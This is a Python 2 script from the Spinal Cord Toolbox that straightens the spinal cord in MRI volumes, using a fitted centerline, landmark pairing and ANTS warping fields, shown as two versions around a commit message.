import time
import commands
import sys
import sct_utils as sct
from sct_utils import fsloutput
from sct_nurbs import NURBS
import nibabel
import numpy
from scipy import interpolate # TODO: check if used
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
# check if dependant software are installed
sct.check_if_installed('flirt -help','FSL')
sct.check_if_installed('WarpImageMultiTransform -h','ANTS')
#=======================================================================================================================
# main
#=======================================================================================================================
def main():
# Initialization
fname_anat = ''
fname_centerline = ''
gapxy = param.gapxy
gapz = param.gapz
padding = param.padding
remove_temp_files = param.remove_temp_files
centerline_fitting = param.fitting_method
verbose = param.verbose
interpolation_warp = param.interpolation_warp
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
print path_sct
# extract path of the script
path_script = os.path.dirname(__file__)+'/'
# Parameters for debug mode
if param.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
#fname_anat = path_sct+'/testing/data/11shortFOV/t1_cropped_short.nii.gz'
#fname_centerline = path_sct+'/testing/data/11shortFOV/spine_cropped_short.nii.gz'
fname_anat = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
fname_centerline = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
remove_temp_files = 0
centerline_fitting = 'splines'
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
verbose = 2
# Check input param
try:
opts, args = getopt.getopt(sys.argv[1:],'hi:c:r:w:f:v:')
except getopt.GetoptError as err:
print str(err)
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ('-i'):
fname_anat = arg
elif opt in ('-c'):
fname_centerline = arg
elif opt in ('-r'):
remove_temp_files = int(arg)
elif opt in ('-w'):
interpolation_warp = str(arg)
elif opt in ('-f'):
centerline_fitting = str(arg)
elif opt in ('-v'):
verbose = int(arg)
# display usage if a mandatory argument is not provided
if fname_anat == '' or fname_centerline == '':
usage()
# Display usage if optional arguments are not correctly provided
if centerline_fitting == '':
centerline_fitting = 'splines'
elif not centerline_fitting == '' and not centerline_fitting == 'splines' and not centerline_fitting == 'polynomial':
print '\n \n -f argument is not valid \n \n'
usage()
# check existence of input files
sct.check_file_exist(fname_anat)
sct.check_file_exist(fname_centerline)
# check interp method
if interpolation_warp == 'spline':
interpolation_warp_ants = '--use-BSpline'
elif interpolation_warp == 'trilinear':
interpolation_warp_ants = ''
elif interpolation_warp == 'nearestneighbor':
interpolation_warp_ants = '--use-NN'
else:
print '\WARNING: Interpolation method not recognized. Using: '+param.interpolation_warp
interpolation_warp_ants = '--use-BSpline'
# Display arguments
print '\nCheck input arguments...'
print ' Input volume ...................... '+fname_anat
print ' Centerline ........................ '+fname_centerline
print ' Centerline fitting option ......... '+centerline_fitting
print ' Final interpolation ............... '+interpolation_warp
print ' Verbose ........................... '+str(verbose)
print ''
# if verbose 2, import matplotlib
if verbose == 2:
import matplotlib.pyplot as plt
# Extract path/file/extension
path_anat, file_anat, ext_anat = sct.extract_fname(fname_anat)
path_centerline, file_centerline, ext_centerline = sct.extract_fname(fname_centerline)
# create temporary folder
path_tmp = 'tmp.'+time.strftime("%y%m%d%H%M%S")
sct.run('mkdir '+path_tmp)
# copy files into tmp folder
sct.run('cp '+fname_anat+' '+path_tmp)
sct.run('cp '+fname_centerline+' '+path_tmp)
# go to tmp folder
os.chdir(path_tmp)
# Open centerline
#==========================================================================================
# Change orientation of the input centerline into RPI
print '\nOrient centerline to RPI orientation...'
fname_centerline_orient = 'tmp.centerline_rpi' + ext_centerline
sct.run('sct_orientation -i ' + file_centerline + ext_centerline + ' -o ' + fname_centerline_orient + ' -orientation RPI')
print '\nGet dimensions of input centerline...'
nx, ny, nz, nt, px, py, pz, pt = sct.get_dimension(fname_centerline_orient)
print '.. matrix size: '+str(nx)+' x '+str(ny)+' x '+str(nz)
print '.. voxel size: '+str(px)+'mm x '+str(py)+'mm x '+str(pz)+'mm'
print '\nOpen centerline volume...'
file = nibabel.load(fname_centerline_orient)
data = file.get_data()
# loop across z and associate x,y coordinate with the point having maximum intensity
x_centerline = [0 for iz in range(0, nz, 1)]
y_centerline = [0 for iz in range(0, nz, 1)]
z_centerline = [iz for iz in range(0, nz, 1)]
x_centerline_deriv = [0 for iz in range(0, nz, 1)]
y_centerline_deriv = [0 for iz in range(0, nz, 1)]
z_centerline_deriv = [0 for iz in range(0, nz, 1)]
# Two possible scenario:
# 1. the centerline is probabilistic: each slice contains voxels with the probability of containing the centerline [0:...:1]
# We only take the maximum value of the image to aproximate the centerline.
# 2. The centerline/segmentation image contains many pixels per slice with values {0,1}.
# We take all the points and approximate the centerline on all these points.
x_seg_start, y_seg_start = (data[:,:,0]>0).nonzero()
x_seg_end, y_seg_end = (data[:,:,-1]>0).nonzero()
# check if centerline covers all the image
if len(x_seg_start)==0 or len(x_seg_end)==0:
print '\nERROR: centerline/segmentation must cover all "z" slices of the input image.\n' \
'To solve the problem, you need to crop the input image (you can use \'sct_crop_image\') and generate one' \
'more time the spinal cord centerline/segmentation from this cropped image.\n'
usage()
# X, Y, Z = ((data<1)*(data>0)).nonzero() # X is empty if binary image
# if (len(X) > 0): # Scenario 1
# for iz in range(0, nz, 1):
# x_centerline[iz], y_centerline[iz] = numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape)
# else: # Scenario 2
# for iz in range(0, nz, 1):
# x_seg, y_seg = (data[:,:,iz]>0).nonzero()
# x_centerline[iz] = numpy.mean(x_seg)
# y_centerline[iz] = numpy.mean(y_seg)
# # TODO: find a way to do the previous loop with this, which is more neat:
# # [numpy.unravel_index(data[:,:,iz].argmax(), data[:,:,iz].shape) for iz in range(0,nz,1)]
# get center of mass of the centerline/segmentation
print '\nGet center of mass of the centerline/segmentation...'
for iz in range(0, nz, 1):
x_centerline[iz], y_centerline[iz] = ndimage.measurements.center_of_mass(data[:,:,iz])
# clear variable
del data
# Fit the centerline points with the kind of curve given as argument of the script and return the new fitted coordinates
if centerline_fitting == 'splines':
x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv = b_spline_centerline(x_centerline,y_centerline,z_centerline)
elif centerline_fitting == 'polynomial':
x_centerline_fit, y_centerline_fit, polyx, polyy = polynome_centerline(x_centerline,y_centerline,z_centerline)
if verbose == 2:
# plot centerline
ax = plt.subplot(1,2,1)
plt.plot(x_centerline, z_centerline, 'b:', label='centerline')
plt.plot(x_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('x')
plt.ylabel('z')
ax = plt.subplot(1,2,2)
plt.plot(y_centerline, z_centerline, 'b:', label='centerline')
plt.plot(y_centerline_fit, z_centerline, 'r-', label='fit')
plt.xlabel('y')
plt.ylabel('z')
handles, labels = ax.get_legend_handles_labels()
ax.legend(handles, labels)
plt.show()
# Get coordinates of landmarks along curved centerline
#==========================================================================================
print '\nGet coordinates of landmarks along curved centerline...'
# landmarks are created along the curved centerline every z=gapz. They consist of a "cross" of size gapx and gapy.
# find derivative of polynomial
step_z = round(nz/gapz)
#iz_curved = [i for i in range (0, nz, gapz)]
iz_curved = [i*step_z for i in range (0, gapz)]
iz_curved.append(nz-1)
#print iz_curved, len(iz_curved)
n_iz_curved = len(iz_curved)
#print n_iz_curved
landmark_curved = [ [ [ 0 for i in range(0,3)] for i in range(0,5) ] for i in iz_curved ]
# print x_centerline_deriv,len(x_centerline_deriv)
# landmark[a][b][c]
# a: index along z. E.g., the first cross with have index=0, the next index=1, and so on...
# b: index of element on the cross. I.e., 0: center of the cross, 1: +x, 2 -x, 3: +y, 4: -y
# c: dimension, i.e., 0: x, 1: y, 2: z
# loop across index, which corresponds to iz (points along the centerline)
if centerline_fitting=='polynomial':
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set x and z coordinates for landmarks +x and -x
landmark_curved[index][1][2], landmark_curved[index][1][0], landmark_curved[index][2][2], landmark_curved[index][2][0] = get_points_perpendicular_to_curve(polyx, polyx.deriv(), iz_curved[index], gapxy)
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
landmark_curved[index][3][2], landmark_curved[index][3][1], landmark_curved[index][4][2], landmark_curved[index][4][1] = get_points_perpendicular_to_curve(polyy, polyy.deriv(), iz_curved[index], gapxy)
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
elif centerline_fitting=='splines':
for index in range(0, n_iz_curved, 1):
# calculate d (ax+by+cz+d=0)
# print iz_curved[index]
a=x_centerline_deriv[iz_curved[index]]
b=y_centerline_deriv[iz_curved[index]]
c=z_centerline_deriv[iz_curved[index]]
x=x_centerline_fit[iz_curved[index]]
y=y_centerline_fit[iz_curved[index]]
z=iz_curved[index]
d=-(a*x+b*y+c*z)
#print a,b,c,d,x,y,z
# set coordinates for landmark at the center of the cross
landmark_curved[index][0][0], landmark_curved[index][0][1], landmark_curved[index][0][2] = x_centerline_fit[iz_curved[index]], y_centerline_fit[iz_curved[index]], iz_curved[index]
# set y coordinate to y_centerline_fit[iz] for elements 1 and 2 of the cross
for i in range(1,3):
landmark_curved[index][i][1] = y_centerline_fit[iz_curved[index]]
# set x and z coordinates for landmarks +x and -x, forcing de landmark to be in the orthogonal plan and the distance landmark/curve to be gapxy
x_n=Symbol('x_n')
landmark_curved[index][2][0],landmark_curved[index][1][0]=solve((x_n-x)**2+((-1/c)*(a*x_n+b*y+d)-z)**2-gapxy**2,x_n) #x for -x and +x
landmark_curved[index][1][2]=(-1/c)*(a*landmark_curved[index][1][0]+b*y+d) #z for +x
landmark_curved[index][2][2]=(-1/c)*(a*landmark_curved[index][2][0]+b*y+d) #z for -x
# set x coordinate to x_centerline_fit[iz] for elements 3 and 4 of the cross
for i in range(3,5):
landmark_curved[index][i][0] = x_centerline_fit[iz_curved[index]]
# set coordinates for landmarks +y and -y. Here, x coordinate is 0 (already initialized).
y_n=Symbol('y_n')
landmark_curved[index][4][1],landmark_curved[index][3][1]=solve((y_n-y)**2+((-1/c)*(a*x+b*y_n+d)-z)**2-gapxy**2,y_n) #y for -y and +y
landmark_curved[index][3][2]=(-1/c)*(a*x+b*landmark_curved[index][3][1]+d)#z for +y
landmark_curved[index][4][2]=(-1/c)*(a*x+b*landmark_curved[index][4][1]+d)#z for -y
# #display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'g')
# ax.plot(x_centerline, y_centerline,z_centerline, 'r')
# ax.plot([landmark_curved[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_curved[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
# Get coordinates of landmarks along straight centerline
#==========================================================================================
print '\nGet coordinates of landmarks along straight centerline...'
landmark_straight = [ [ [ 0 for i in range(0,3)] for i in range (0,5) ] for i in iz_curved ] # same structure as landmark_curved
# calculate the z indices corresponding to the Euclidean distance between two consecutive points on the curved centerline (approximation curve --> line)
iz_straight = [0 for i in range (0,gapz+1)]
#print iz_straight,len(iz_straight)
for index in range(1, n_iz_curved, 1):
# compute vector between two consecutive points on the curved centerline
vector_centerline = [x_centerline_fit[iz_curved[index]] - x_centerline_fit[iz_curved[index-1]], \
y_centerline_fit[iz_curved[index]] - y_centerline_fit[iz_curved[index-1]], \
iz_curved[index] - iz_curved[index-1]]
# compute norm of this vector
norm_vector_centerline = numpy.linalg.norm(vector_centerline, ord=2)
# round to closest integer value
norm_vector_centerline_rounded = int(round(norm_vector_centerline,0))
# assign this value to the current z-coordinate on the straight centerline
iz_straight[index] = iz_straight[index-1] + norm_vector_centerline_rounded
# initialize x0 and y0 to be at the center of the FOV
x0 = int(round(nx/2))
y0 = int(round(ny/2))
for index in range(0, n_iz_curved, 1):
# set coordinates for landmark at the center of the cross
landmark_straight[index][0][0], landmark_straight[index][0][1], landmark_straight[index][0][2] = x0, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +x
landmark_straight[index][1][0], landmark_straight[index][1][1], landmark_straight[index][1][2] = x0 + gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks -x
landmark_straight[index][2][0], landmark_straight[index][2][1], landmark_straight[index][2][2] = x0-gapxy, y0, iz_straight[index]
# set x, y and z coordinates for landmarks +y
landmark_straight[index][3][0], landmark_straight[index][3][1], landmark_straight[index][3][2] = x0, y0+gapxy, iz_straight[index]
# set x, y and z coordinates for landmarks -y
landmark_straight[index][4][0], landmark_straight[index][4][1], landmark_straight[index][4][2] = x0, y0-gapxy, iz_straight[index]
# # display
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# #ax.plot(x_centerline_fit, y_centerline_fit,z_centerline, 'r')
# ax.plot([landmark_straight[i][j][0] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][1] for i in range(0, n_iz_curved) for j in range(0, 5)], \
# [landmark_straight[i][j][2] for i in range(0, n_iz_curved) for j in range(0, 5)], '.')
# ax.set_xlabel('x')
# ax.set_ylabel('y')
# ax.set_zlabel('z')
# plt.show()
#
# Create NIFTI volumes with landmarks
#==========================================================================================
# Pad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV
# N.B. IT IS VERY IMPORTANT TO PAD ALSO ALONG X and Y, OTHERWISE SOME LANDMARKS MIGHT GET OUT OF THE FOV!!!
print '\nPad input volume to deal with the fact that some landmarks on the curved centerline might be outside the FOV...'
sct.run('c3d '+fname_centerline_orient+' -pad '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox '+str(padding)+'x'+str(padding)+'x'+str(padding)+'vox 0 -o tmp.centerline_pad.nii.gz')
# TODO: don't pad input volume: no need for that! instead, try to increase size of hdr when saving landmarks.
# Open padded centerline for reading
print '\nOpen padded centerline for reading...'
file = nibabel.load('tmp.centerline_pad.nii.gz')
data = file.get_data()
hdr = file.get_header()
# Create volumes containing curved and straight landmarks
data_curved_landmarks = data * 0
data_straight_landmarks = data * 0
# initialize landmark value
landmark_value = 1
# Loop across cross index
for index in range(0, n_iz_curved, 1):
# loop across cross element index
for i_element in range(0, 5, 1):
# get x, y and z coordinates of curved landmark (rounded to closest integer)
x, y, z = int(round(landmark_curved[index][i_element][0])), int(round(landmark_curved[index][i_element][1])), int(round(landmark_curved[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_curved_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# get x, y and z coordinates of straight landmark (rounded to closest integer)
x, y, z = int(round(landmark_straight[index][i_element][0])), int(round(landmark_straight[index][i_element][1])), int(round(landmark_straight[index][i_element][2]))
# attribute landmark_value to the voxel and its neighbours
data_straight_landmarks[x+padding-1:x+padding+2, y+padding-1:y+padding+2, z+padding-1:z+padding+2] = landmark_value
# increment landmark value
landmark_value = landmark_value + 1
# Write NIFTI volumes
hdr.set_data_dtype('uint32') # set imagetype to uint8 #TODO: maybe use int32
print '\nWrite NIFTI volumes...'
img = nibabel.Nifti1Image(data_curved_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_curved.nii.gz')
print '.. File created: tmp.landmarks_curved.nii.gz'
img = nibabel.Nifti1Image(data_straight_landmarks, None, hdr)
nibabel.save(img, 'tmp.landmarks_straight.nii.gz')
print '.. File created: tmp.landmarks_straight.nii.gz'
# Estimate deformation field by pairing landmarks
#==========================================================================================
# Dilate landmarks (because nearest neighbour interpolation will be later used, therefore some landmarks may "disapear" if they are single points)
#print '\nDilate landmarks...'
#sct.run(fsloutput+'fslmaths tmp.landmarks_curved.nii -kernel box 3x3x3 -dilD tmp.landmarks_curved_dilated -odt short')
#sct.run(fsloutput+'fslmaths tmp.landmarks_straight.nii -kernel box 3x3x3 -dilD tmp.landmarks_straight_dilated -odt short')
# Estimate rigid transformation
print '\nEstimate rigid transformation between paired landmarks...'
sct.run('ANTSUseLandmarkImagesToGetAffineTransform tmp.landmarks_straight.nii.gz tmp.landmarks_curved.nii.gz rigid tmp.curve2straight_rigid.txt')
# Apply rigid transformation
print '\nApply rigid transformation to curved landmarks...'
sct.run('WarpImageMultiTransform 3 tmp.landmarks_curved.nii.gz tmp.landmarks_curved_rigid.nii.gz -R tmp.landmarks_straight.nii.gz tmp.curve2straight_rigid.txt --use-NN')
# Estimate b-spline transformation curve --> straight
print '\nEstimate b-spline transformation: curve --> straight...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_straight.nii.gz tmp.landmarks_curved_rigid.nii.gz tmp.warp_curve2straight.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.curve2straight.nii.gz -R tmp.landmarks_straight.nii.gz tmp.warp_curve2straight.nii.gz tmp.curve2straight_rigid.txt'
print('>> '+cmd)
commands.getstatusoutput(cmd)
# Estimate b-spline transformation straight --> curve
# TODO: invert warping field instead of estimating a new one
print '\nEstimate b-spline transformation: straight --> curve...'
sct.run('ANTSUseLandmarkImagesToGetBSplineDisplacementField tmp.landmarks_curved_rigid.nii.gz tmp.landmarks_straight.nii.gz tmp.warp_straight2curve.nii.gz 5x5x5 3 2 0')
# Concatenate rigid and non-linear transformations...
print '\nConcatenate rigid and non-linear transformations...'
#sct.run('ComposeMultiTransform 3 tmp.warp_rigid.nii -R tmp.landmarks_straight.nii tmp.warp.nii tmp.curve2straight_rigid.txt')
# TODO: use sct.run() when output from the following command will be different from 0 (currently there seem to be a bug)
cmd = 'ComposeMultiTransform 3 tmp.straight2curve.nii.gz -R tmp.landmarks_straight.nii.gz -i tmp.curve2straight_rigid.txt tmp.warp_straight2curve.nii.gz'
print('>> '+cmd)
commands.getstatusoutput(cmd)
#print '\nPad input image...'
#sct.run('c3d '+fname_anat+' -pad '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox '+str(padz)+'x'+str(padz)+'x'+str(padz)+'vox 0 -o tmp.anat_pad.nii')
# Unpad landmarks...
# THIS WAS REMOVED ON 2014-06-03 because the output data was cropped at the edge, which caused landmarks to sometimes disappear
# print '\nUnpad landmarks...'
# sct.run('fslroi tmp.landmarks_straight.nii.gz tmp.landmarks_straight_crop.nii.gz '+str(padding)+' '+str(nx)+' '+str(padding)+' '+str(ny)+' '+str(padding)+' '+str(nz))
# Apply deformation to input image
print '\nApply transformation to input image...'
sct.run('WarpImageMultiTransform 3 '+file_anat+ext_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# sct.run('WarpImageMultiTransform 3 '+fname_anat+' tmp.anat_rigid_warp.nii.gz -R tmp.landmarks_straight_crop.nii.gz '+interpolation_warp+ ' tmp.curve2straight.nii.gz')
# Generate output file (in current folder)
# TODO: do not uncompress the warping field, it is too time consuming!
print '\nGenerate output file (in current folder)...'
sct.generate_output_file(path_tmp+'/tmp.curve2straight.nii.gz','','warp_curve2straight',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.straight2curve.nii.gz','','warp_straight2curve',ext_anat) # warping field
sct.generate_output_file(path_tmp+'/tmp.anat_rigid_warp.nii.gz','',file_anat+'_straight',ext_anat) # straightened anatomic
# come back to parent folder
os.chdir('..')
# Remove temporary files
if remove_temp_files == 1:
print('\nRemove temporary files...')
sct.run('rm -rf '+path_tmp)
print '\nDone!\n'
#=======================================================================================================================
# get_points_perpendicular_to_curve
#=======================================================================================================================
# output: x1, y1, x2, y2
def get_points_perpendicular_to_curve(poly, dpoly, x, gap):
# get a: slope of the line perpendicular to the tangent of the curve at a specific point
if dpoly(x) != 0:
a = -1/dpoly(x)
else:
print 'TODO: case of null derivative'
# get y: ordinate that intersects the curve and the line
y = poly(x)
# convert slope to radian
a_rad = numpy.arctan(a)
# get coordinates of the two points on the line at a distance "gap" from the curve
x1 = x + ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
y1 = y + ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
x2 = x - ( gap * numpy.cos(a_rad) * sct.sign(a_rad) )
y2 = y - ( gap * numpy.sin(a_rad) * sct.sign(a_rad) )
return x1, y1, x2, y2
#=======================================================================================================================
# B-Spline fitting
#=======================================================================================================================
def b_spline_centerline(x_centerline,y_centerline,z_centerline):
"""Give a better fitting of the centerline than the method 'spline_centerline' using b-splines"""
print '\nFit centerline using B-spline approximation'
points = [[x_centerline[n], y_centerline[n], z_centerline[n]] for n in range(len(x_centerline))]
nurbs = NURBS(3, 3000, points) # BE very careful with the spline order that you choose : if order is too high ( > 4 or 5) you need to set a higher number of Control Points (cf sct_nurbs ). For the third argument (number of points), give at least len(z_centerline)+500 or higher
P = nurbs.getCourbe3D()
x_centerline_fit = P[0]
y_centerline_fit = P[1]
Q = nurbs.getCourbe3D_deriv()
x_centerline_deriv = Q[0]
y_centerline_deriv = Q[1]
z_centerline_deriv = Q[2]
return x_centerline_fit, y_centerline_fit, x_centerline_deriv, y_centerline_deriv, z_centerline_deriv
#=======================================================================================================================
# Polynomial fitting
#=======================================================================================================================
def polynome_centerline(x_centerline,y_centerline,z_centerline):
"""Fit polynomial function through centerline"""
# Fit centerline in the Z-X plane using polynomial function
print '\nFit centerline in the Z-X plane using polynomial function...'
coeffsx = numpy.polyfit(z_centerline, x_centerline, deg=param.deg_poly)
polyx = numpy.poly1d(coeffsx)
x_centerline_fit = numpy.polyval(polyx, z_centerline)
#Fit centerline in the Z-Y plane using polynomial function
print '\nFit centerline in the Z-Y plane using polynomial function...'
coeffsy = numpy.polyfit(z_centerline, y_centerline, deg=param.deg_poly)
polyy = numpy.poly1d(coeffsy)
y_centerline_fit = numpy.polyval(polyy, z_centerline)
return x_centerline_fit,y_centerline_fit,polyx,polyy
#=======================================================================================================================
# usage
#=======================================================================================================================
def usage():
print '\n' \
''+os.path.basename(__file__)+'\n' \
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n' \
'Part of the Spinal Cord Toolbox <https://sourceforge.net/projects/spinalcordtoolbox>\n' \
'\n'\
'DESCRIPTION\n' \
' This function straightens the spinal cord using its centerline (or segmentation).\n' \
'\n'\
'USAGE\n' \
' '+os.path.basename(__file__)+' -i <data> -c <centerline>\n' \
'\n'\
'MANDATORY ARGUMENTS\n' \
' -i input volume.\n' \
' -c centerline or segmentation. Centerline must cover each "z" slices.\n' \
'\n'\
'OPTIONAL ARGUMENTS\n' \
' -p <padding> amount of padding for generating labels. Default='+str(param.padding)+'\n' \
' -f {splines,polynomial} Method used to fit the centerline (or segmentation). Default='+str(param.fitting_method)+'\n' \
' -w {nearestneighbor,trilinear,spline} Final interpolation. Default='+str(param.interpolation_warp)+'\n' \
' -r {0,1} remove temporary files. Default=1. \n' \
' -v {0,1,2} verbose. 0: nothing, 1: txt, 2: txt+fig. Default='+str(param.verbose)+'\n' \
' -h help. Show this message.\n' \
'\n'\
'EXAMPLE:\n' \
' sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz\n'
sys.exit(2)
#=======================================================================================================================
# Start program
#=======================================================================================================================
if __name__ == "__main__":
# initialize parameters
param = param()
# call main function
main()
BUG: small fix
Former-commit-id: c9161091923168996580a3fa58e3977e40dc0c36
Former-commit-id: c67248069510b6fc7c1ba5aa568b62510e5ba32f
#!/usr/bin/env python
## @package sct_straighten_spinalcord
#
# - from spinal cord centerline (as nifti format), estimate deformation field with ANTS.
#
#
# Description about how the function works:
# This program takes as input an anatomic image and the centerline or segmentation of its spinal cord (that you can get
# using sct_get_centerline.py or sct_segmentation_propagation) and returns the anatomic image where the spinal
# cord was straightened.
#
#
# USAGE
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i <data> -c <centerline>
#
# MANDATORY ARGUMENTS
# ---------------------------------------------------------------------------------------
# -i input volume.
# -c centerline (generated with sct_get_centerline).
#
# OPTIONAL ARGUMENTS
# ---------------------------------------------------------------------------------------
#
# -f 'polynomial' or 'splines' fitting default is 'splines'
#
# EXAMPLES
# ---------------------------------------------------------------------------------------
# sct_straighten_spinalcord.py -i t2.nii.gz -c centerline.nii.gz
#
#
# DEPENDENCIES
# ---------------------------------------------------------------------------------------
# EXTERNAL PYTHON PACKAGES
# - nibabel: <http://nipy.sourceforge.net/nibabel/>
# - numpy: <http://www.numpy.org>
# - sympy : <http://sympy.org/fr/index.html>
# EXTERNAL SOFTWARE
# - FSL: <http://fsl.fmrib.ox.ac.uk/fsl/>
# - ANTS
#
#
# ---------------------------------------------------------------------------------------
# Copyright (c) 2013 NeuroPoly, Polytechnique Montreal <www.neuro.polymtl.ca>
# Authors: Julien Cohen-Adad, Geoffrey Leveque, Julien Touati
# Modified: 2014-07-05 by jcohen
#
# License: see the LICENSE.TXT
#=======================================================================================================================
# TODO: calculate backward transformation from forward instead of estimating it
# TODO: fix bug of label creation when using splines (2014-06-05: error with data from Falk with small FOV along z)
# TODO: generate cross at both edge (top and bottom) and populate in between --> this will ensure better quality of the warping field.
# TODO: check if there is an overlap of labels, in case of high curvature and high density of cross along z.
# TODO: convert gap definition to mm (more intuitive than voxel)
# 2014-06-06: corrected bug related to small FOV volumes Solution: reduced spline order (3), computation of a lot of point (1000)
## Create a structure to pass important user parameters to the main function
class param:
## The constructor
def __init__(self):
self.debug = 1
self.deg_poly = 10 # maximum degree of polynomial function for fitting centerline.
self.gapxy = 20 # size of cross in x and y direction for the landmarks
self.gapz = 15 # gap between landmarks along z
self.padding = 30 # pad input volume in order to deal with the fact that some landmarks might be outside the FOV due to the curvature of the spinal cord
self.fitting_method = 'splines' # splines | polynomial
self.interpolation_warp = 'spline'
self.remove_temp_files = 1 # remove temporary files
self.verbose = 1
# check if needed Python libraries are already installed or not
import os
import getopt
import time
import commands
import sys
import sct_utils as sct
from sct_utils import fsloutput
from sct_nurbs import NURBS
import nibabel
import numpy
from scipy import interpolate # TODO: check if used
from sympy.solvers import solve
from sympy import Symbol
from scipy import ndimage
# check if dependant software are installed
sct.check_if_installed('flirt -help','FSL')
sct.check_if_installed('WarpImageMultiTransform -h','ANTS')
#=======================================================================================================================
# main
#=======================================================================================================================
def main():
# Initialization
fname_anat = ''
fname_centerline = ''
gapxy = param.gapxy
gapz = param.gapz
padding = param.padding
centerline_fitting = param.fitting_method
remove_temp_files = param.remove_temp_files
verbose = param.verbose
interpolation_warp = param.interpolation_warp
# get path of the toolbox
status, path_sct = commands.getstatusoutput('echo $SCT_DIR')
print path_sct
# extract path of the script
path_script = os.path.dirname(__file__)+'/'
# Parameters for debug mode
if param.debug == 1:
print '\n*** WARNING: DEBUG MODE ON ***\n'
#fname_anat = path_sct+'/testing/data/11shortFOV/t1_cropped_short.nii.gz'
#fname_centerline = path_sct+'/testing/data/11shortFOV/spine_cropped_short.nii.gz'
# fname_anat = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
# fname_centerline = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data_up.nii.gz'
fname_anat = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data.nii'
fname_centerline = '/Users/julien/code/spinalcordtoolbox/testing/data/errsm_23/t2/tmp.140706150926/data.nii'
remove_temp_files = 0
centerline_fitting = 'splines'
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
verbose = 2
# Check input param
try:
opts, args = getopt.getopt(sys.argv[1:],'hi:c:r:w:f:v:')
except getopt.GetoptError as err:
print str(err)
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ('-i'):
fname_anat = arg
elif opt in ('-c'):
fname_centerline = arg
elif opt in ('-r'):
remove_temp_files = int(arg)
elif opt in ('-w'):
interpolation_warp = str(arg)
elif opt in ('-f'):
centerline_fitting = str(arg)
elif opt in ('-v'):
verbose = int(arg)
# display usage if a mandatory argument is not provided
if fname_anat == '' or fname_centerline == '':
usage()
# Display usage if optional arguments are not correctly provided
if centerline_fitting == '':
centerline_fitting = 'splines'
elif not centerline_fitting == '' and not centerline_fitting == 'splines' and not centerline_fitting == 'polynomial':
print '\n \n -f argument is not valid \n \n'
usage()
# check existence of input files
sct.check_file_exist(fname_anat)
sct.check_file_exist(fname_centerline)
# check interp method
if interpolation_warp == 'spline':
interpolation_warp_ants = '--use-BSpline'
elif interpolation_warp == 'trilinear':
interpolation_warp_ants = ''
elif interpolation_warp == 'nearestneighbor':
interpolation_warp_ants = '--use-NN'
else:
print '\WARNING: Interpolation method not recognized. Using: '+param.interpolation_warp
interpolation_warp_ants = '--use-BSpline'
# Display arguments
print '\nCheck input arguments...'
print ' Input volume ...................... '+fname_anat
print ' Centerline ........................ '+fname_centerline
print ' Centerline fitting option ......... '+centerline_fitting
